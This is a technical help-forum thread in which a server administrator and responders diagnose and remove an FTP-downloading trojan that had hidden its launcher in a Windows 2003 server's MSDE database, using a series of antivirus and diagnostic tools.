Server Virus - d.vbs, run.vbs, youtou.sys

I have a virus on a server that seems to be running somewhere on the server, accessing an external ftp site and downloading more files to the server.

Common files i find are in the system32 folder:

1.bat
2.bat
1.txt
2.txt
youtou.sys
d.vbs
run.vbs
sysme.bat
ntdos87.bat

There are more. I found a txt file called. cc1.txt that had an ftp site listed with username and password and it was getting files all.exe and 2.exe.

Anyone seen this and know how I can remove it?? I have Trend Micro Worry-free security installed, malwarebytes, spyware doctor and prevx, but none can pick it up.



LVL 1
wint100Asked:
Who is Participating?
 
Adam LeinssConnect With a Mentor Senior Desktop EngineerCommented:
If you still have the WinPE CD around, try downloading the Mcafee SuperDat from
http://download.nai.com/products/licensed/superdat/english/intel/sdat5600.exe
Extract the contacts by running the EXE with a "/e" switch
Scan the drive with "scan C: /clean"
I don't think the virus is in the SQL database, because the database is just flat data.  The virus is probably just hooked into the service because that's just one of the things that start with Windows.
0
 
Adam LeinssSenior Desktop EngineerCommented:
Boot the server with UBCD4WIN (http://www.ubcd4win.com/), then run Sophos command line (with the latest IDEs) from here:
http://www.sophos.com/support/knowledgebase/article/13251.html
I had a piece of malware called entuala.dll that was not picked up by NOD32 or Malwarebytes, but Sophos did pick it up.
0
 
warturtleCommented:
Have you done the MalwareBytes scan in safe mode?? or normal mode?? I suggest you try a scan in safe mode if you haven't already before trying out the below instructions. In safe mode, it will pick up a lot more than you would normally think. Lots of in-memory viruses are not loaded in background in safe mode and hence, can be caught by scanners. Following this, you should scan with Trend Micro scanner.

If the above doesn't work then, I would suggest downloading ComboFix from http://download.bleepingcomputer.com/sUBs/ComboFix.exe , saving it with a completely different filename like jabba.exe and then rebooting your server in safe mode. Then, disable all your antivirus, firewall and antispyware programs and run ComboFix, it will scan and create a log. After the log is created, please re-activate your security programs and send the log to us.

Further instructions are here:
http://www.bleepingcomputer.com/combofix/how-to-use-combofix

I suggest that you scan the server with MalwareBytes in safe mode right after ComboFix is done, you should see MalwareBytes picking up infections now.

Hope it helps.
0
Worried about phishing attacks?

90% of attacks start with a phish. It’s critical that IT admins and MSSPs have the right security in place to protect their end users from these phishing attacks. Check out our latest feature brief for tips and tricks to keep your employees off a hackers line!

 
wint100Author Commented:
Tried the bove solutions, it found a registry entry in image for execution option\cscript.exe. This has been removed, but the files still reappeared last night in the system32 folder.

yantou.sys
setuplp.bat
1.txt
0
 
warturtleCommented:
Did you try ComboFix ?? If yes, can you send us the log to inspect?
0
 
wint100Author Commented:
Combofix doesn't support Windoes 2003 Server.

The infected machine is a Windiws 2003 Domain Controller.
0
 
warturtleCommented:
Oops, sorry. Could you try Process Explorer and see if you see anything strange running in the background ?

http://technet.microsoft.com/en-us/sysinternals/bb896653.aspx

Alternatively, you can send us a HijackThis log to see the background processes:
http://www.trendsecure.com/portal/en-US/tools/security_tools/hijackthis

0
 
wint100Author Commented:
I tried processexplorer but didn't see anything obvious.

Hijackthis log is attached.
hijackthis.log
0
 
wint100Author Commented:
Does AutoexNT.exe need to be running or could this be a cloaked virus?
0
 
warturtleCommented:
It looks like a legitimate file. I suggest that you download UnHackMe from http://www.greatis.com/unhackme/ and install and run it. It will scan your system and study the boot processes and give a report that contains the name of the suspicious programs that are running at bootup. While operating this program, please have a look at the screenshots to learn how it works:

http://www.greatis.com/unhackme/antirootkit.htm

0
 
wint100Author Commented:
I tried unhackme without much success.

I have been monitoring things with processmonitor and found 2 instances of CMD.exe running under sn sqlserver parent process. The CMD.exe were running with a command string which included the file names that kept appearing in system32 folder. It looks like something is running the command, searching forfiles on a remote ftp server, and dumping files to system32. The virus looks to be in the SQL database.

I am running MSDE, is there a way to find the files in the SQL database?

0
 
wint100Author Commented:
What if i backed up the SQL database, unistalled MSDE and install SQL express 2008. I've been meaning to upgrade for weeks anyway to increase my database limit.
0
 
warturtleConnect With a Mentor Commented:
I suggest a full scan with Kaspersky Online Scanner based at: http://www.kaspersky.co.uk/virusscanner . This scan wouldn't remove any infections, but will detect them and report back. Do this in IE by the way, it will install an ActiveX component. After the updates are done, click on 'Scan Settings' and check 'Extended Database' and then click OK and start scanning. After the scan is done, save the scan results as a text file and post it here. Kaspersky has the highest rates of detection and should hopefully tell us what is creating those files.

If the Worm is still around and you upgrade the SQL Server, it might not really solve the problem. The worm might still connect to FTP sites and download stuff.  As far as I understand, you have this trojan - Trojan-Downloader.BAT.Ftp.ab or one of its variants( http://www.viruslist.com/en/viruses/encyclopedia?virusid=76295 ).

0
 
wint100Author Commented:
OK i'll give it a go.

I've connected to the database and 2 tables exist under the master database called:

dbo.resultcmd_cc and dbo.tmpdata.

Should these be there? I've checked another SQL server and they aren't present. All the apps using SQL are using seperate Instances.
0
 
warturtleCommented:
It doesn't really ring a bell, I haven't used SQL Server much. It might be worth having a look at the data within those tables to see if its relevant to the organisation, moreover, it might also be worth having a quick look at Stored Procedures within SQL Server that use these tables. That might give a clue.
0
 
wint100Author Commented:
Will do cheers. Just running the Online scanner now so I'll view result in the morning.
0
 
wint100Author Commented:
Looks like the virus is now clean. Kaspersky online scanner found nothing after i deleted the 2 suspect tables from the SQL database.

I sent the files I found in the system32 off to Trend Micro and they confirmed it was:

dhcp.exe (799,744 bytes) as TROJ_SERVU.AK

run.vbs (1,082 bytes) as VBS_SMALL.C


Thanks
0
 
warturtleCommented:
That good stuff! Its new for me to see a virus that was sort of embedded in SQL Server or atleast its information/instructions were. Do a full scan with Trend Micro antivirus as a last check and if that comes clean, then you're good to go.
0
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

All Courses

From novice to tech pro — start learning today.